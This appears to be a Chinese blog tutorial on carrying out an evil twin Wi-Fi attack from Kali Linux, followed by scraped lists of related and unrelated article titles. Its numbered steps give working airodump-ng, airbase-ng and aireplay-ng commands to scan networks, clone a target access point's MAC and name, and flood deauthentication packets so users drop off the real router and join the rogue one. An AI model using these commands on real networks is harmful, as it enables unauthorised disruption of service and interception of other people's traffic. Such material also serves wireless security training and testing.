1. 在kail 输入: airodump-ng  wlan0mon  (此命令用于扫描周围无线网络)  在扫出的网络里确定你要攻击的mac。如下图所示。                                     

2. 输入: airbase-ng  --essid  Rogue -c 8 wlan0mon                                                                         

3. 在kali 输入:  airodump-ng  -c  受攻击ap的频道  wlan0mon        将会显示受攻击的AP和搭建的欺骗AP的临时名称,如下图所示。                                                                                                       

4. 在kali 输入: airbase-ng  -a  要伪装的AP的MAC  --essid  "要伪装的AP的名称"  -c  11  wlan0mon                                                                                                                                            

5. 在kali 输入: airodump-ng  --bssid 被伪装的AP的物理地址MAC  --channel 11 wlan0mon   看不出在同一个信道上运行着两台不同的物理AP 。如下图所示。                                                           

6. 在kali 输入:aireplay-ng  -0  99  -a 被伪装攻击的路由器MAC  --ignore-negative-one  wlan0mon      向被伪装攻击的路由器发送解除数据验证包,令其掉线。 如下图所示。                                           

8.  输入:  airbase-ng  -a  被伪装攻击的路由器的MAC  --essid  "被伪装攻击的路由器的名称"  -c  11   wlan0mon       (此名令用于激活搭建的伪造AP,便于让其连接被攻击的路由器的使用者连上此AP) 。如下图所示。                                                                                                                                                 

配合MAC地址欺骗的evil twin 攻击相关推荐

  1. 数据链路层——MAC地址欺骗及泛洪

    数据链路层--MAC地址欺骗及泛洪 一.MAC地址欺骗 1.说明 2.工具 3.实验 关闭网卡 修改MAC地址 开启网卡 二.MAC地址泛洪 1.原理 2.工具 3.实验 搭建ENSP macof泛洪 ...

  2. 云计算高级运维第一阶段项目实战:在局域网中使用 awl 伪装 MAC 地址进行多线程 SYN 洪水攻击

    在局域网中使用 awl 伪装 MAC 地址进行多线程 SYN 洪水攻击 (1)SYN 洪水攻击的过程 在服务器返回一个确认的 SYN-ACK 包的时候有个潜在的弊端,如果发起的客户是一个不存在的客户端 ...

  3. 《Nmap渗透测试指南》—第6章6.9节MAC地址欺骗

    本节书摘来自异步社区<Nmap渗透测试指南>一书中的第6章6.9节MAC地址欺骗,作者 商广明,更多章节内容可以访问云栖社区"异步社区"公众号查看. 6.9 MAC地址 ...

  4. 关于局域网ARP攻击,MAC地址欺骗的解决方法

    最近很多网络反映频繁断线并且网速较慢,已经确认:这是由于一种名为"网吧传奇杀手Trojan.PSW.LMir.qh " 的病毒爆发引起的,现我们发布查找病毒以及基本解决办法:    ...

  5. MAC地址欺骗攻击实验

    如图,终端A和终端B.C之间通信,会在交换机的各个端口建立转发表,当终端B向终端A发送一个数据帧时,终端A会返回终端B一个响应数据(ICMP).如下图: 当把终端A的MAC地址作为终端C的MAC时,继 ...

  6. 利用tcp三次握手,使用awl伪装MAC地址进行多线程SYN洪水攻击

    SYN洪水攻击概述: SYN洪水攻击主要源于: tcp协议的三次握手机制 tcp协议面向链接的协议 SYN洪水攻击的过程: 在服务端返回一个确认的SYN-ACK包的时候有个潜在的弊端,如果发起的客户是 ...

  7. wireshark学习笔记(MAC地址欺骗)

    打开kali linux,我们可以使用kali中的macchanger软件更改我们在交换机中的MAC地址,达到隐藏我们真实MAC地址的目的. 在终端界面中输入macchanger -h可以查看macc ...

  8. 网络安全——局域网内网络防范手段(MAC地址攻击、ARP攻击、DHCP攻击)

    今天给大家介绍一下局域网内的网络攻击手段的防范手段.主要是依托华为交换机和路由器配置,介绍MAC地址攻击.ARP攻击.DHCP攻击等攻击的防范.本文会把华为交换机系列防御配置命令进行介绍,适合对局域网 ...

  9. 基于MAC地址的安全配置与管理

    MAC地址是网络设备中不变的物理地址,所以基于MAC地址的接入控制就成了最直接,甚至可能是大多数情况下最有效的控制手段.在二层交换网络中,是通过依靠保存在交换机中的MAC地址表来进行寻址的,这时如果控 ...

最新文章

  1. 代码整洁之道——童子军军规
  2. XTU -1231 人生成就 (dp + 记录最优解的个数)
  3. 【数据结构与算法】之深入解析“课程表II”的求解思路与算法示例
  4. ActiveMQ_安全配置(五)
  5. 《JavaScript设计模式与开发实践》模式篇(3)—— 代理模式
  6. 学习笔记(38):Python实战编程-窗体显示
  7. Lucifer的一场暴强围英雄表演
  8. 来吧学学.Net Core之项目文件简介及配置文件与IOC的使用
  9. 【渝粤教育】 国家开放大学2020年春季 1171科学与技术 参考试题
  10. canny算法的实现(android加载图片,数组写入文件换行)
  11. 推荐算法--利用用户行为数据(02)
  12. 关于代码控制管理的一些想法
  13. 【实习之T100开发】T100 P处理开发流程
  14. 自我介绍html模板王,一分钟自我介绍模板范文15篇
  15. linux下查看计划任务,linux查看计划任务.docx
  16. eMMC的使用寿命分析
  17. 在电路中,耦合是什么?有哪些方式?
  18. Linux系统配置及服务管理_02章_文件和用户管理
  19. idea 修改单个文件的 编码格式
  20. 华为ax3怎么接光纤sc接口_华为路由器AX3怎么设置?

热门文章

  1. 求生意志服务器列表为空,第五人格:共研服更新天赋!不改“求生意志”却调整“好奇心”...
  2. 维修计算机起名字,电脑维修店起名,电脑维修店起名大全
  3. 电商产品设计:商品的基本属性与销售属性
  4. 烤仔看世界 | 铝业巨头遭勒索陷落至暗时刻 “老学校”破黑客彰显英雄本色...
  5. 微信H5分享到朋友圈,转发朋友功能随记
  6. WordPress 开发带缩略图的小工具最新文章
  7. 显卡驱动怎么更新下载,驱动人生一键解决
  8. 高斯勒让德在c语言中的程序,c语言:用递归方法编写程序,求n阶勒让德多项式的值...
  9. 计算机三种桌面图标,电脑桌面图标都变成lnk后缀的三种解决办法
  10. 任意输入三个数字,按从小到大输出(Python)